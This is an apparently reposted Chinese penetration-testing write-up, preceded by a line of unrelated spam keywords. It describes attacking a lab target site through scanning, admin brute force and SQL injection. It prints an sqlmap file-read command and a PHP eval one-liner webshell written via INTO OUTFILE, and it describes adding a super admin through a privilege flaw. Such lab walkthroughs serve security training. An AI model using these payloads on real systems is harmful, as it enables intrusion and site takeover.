线上网站设计培训,建立网站服务的公司网站,wordpress网站音乐放不全,赵本山死了最新新闻声明#xff1a;本片文章测试网站为测试靶场 信息收集阶段#xff1a; 首先使用了一些常见的扫描工具#xff1a;nmap 御剑 使用nmap扫描端口 发现网站开放了 135 139 445 3306 等端口 这里可以看到网站开放了一些危害较高端口#xff1a;135 225等 使用御剑扫描到一些敏感… 声明本片文章测试网站为测试靶场 信息收集阶段 首先使用了一些常见的扫描工具nmap 御剑 使用nmap扫描端口 发现网站开放了 135 139 445 3306 等端口 这里可以看到网站开放了一些危害较高端口135 225等 使用御剑扫描到一些敏感信息phpinfo页面 后台登录地址 可以从info页面直接看到网站的配置信息网站绝对路径 当访问IP80端口发现有探针可从中看出网站的中间件等信息 这里的phpmyadmin管理无法打开 测试阶段 信息收集完成后开始进一步测试 针对网站进行手工测试 在用户登录处发现该网站没有对登录进行严格限制而且可以通过返回错误信息发现网站存在哪些用户 根据返回信息可以发现网站有admin用户尝试使用暴力破解 使用工具BurpSuite 对用户名为admin的用户进行暴力破解 密码为弱口令 可以登录用户 继续测试发现网站存在SQL注入 尝试使用工具进行注入检测 使用工具sqlmap 经过注入发现网站后台的用户名及密码 phpmyadmin的用户及密码 密码为密文尝试解密发现只有data 和kefu用户可以解开 在注入时发现我们的权限可以进行读文件但是不可写尝试通过读取配置文件获取root密码 读取文件需要网站绝对路劲这是我们可以访问之前的info页面获取绝对路径 尝试使用sqlmap进行读取文件 成功读取到root密码 但是没有发现phpmyadmin的页面 sqlmap -u 注入点的URL --file-read “网站绝对路径/读取的文件“ 在前端无法和会员登录后无法找到漏洞尝试登陆后台继续测试 在使用data用户登录后发现为普通权限 在后台对每项功能进行测试发现有一个执行sql语句的模块 尝试使用sql语句进行写入一句话发现写入成功 select ?php eval($_POST[apple]);? into outfile 网站绝对路径/1.php //1.php 为写入一句话木马的文件名 在发现自己权限普通权限尝试通过抓包获取包信息发现存在越权漏洞垂直 使用工具burp 通过burp抓取添加管理员的包修改fr_admin_typemanage 发现成功添加超级管理员 使用菜刀(蚁剑)连接写入的一句话 下篇 【提权过程】嘉缘网站--代理提权 https://www.cnblogs.com/G-Shadow/p/10965035.html 转载于:https://www.cnblogs.com/G-Shadow/p/10964374.html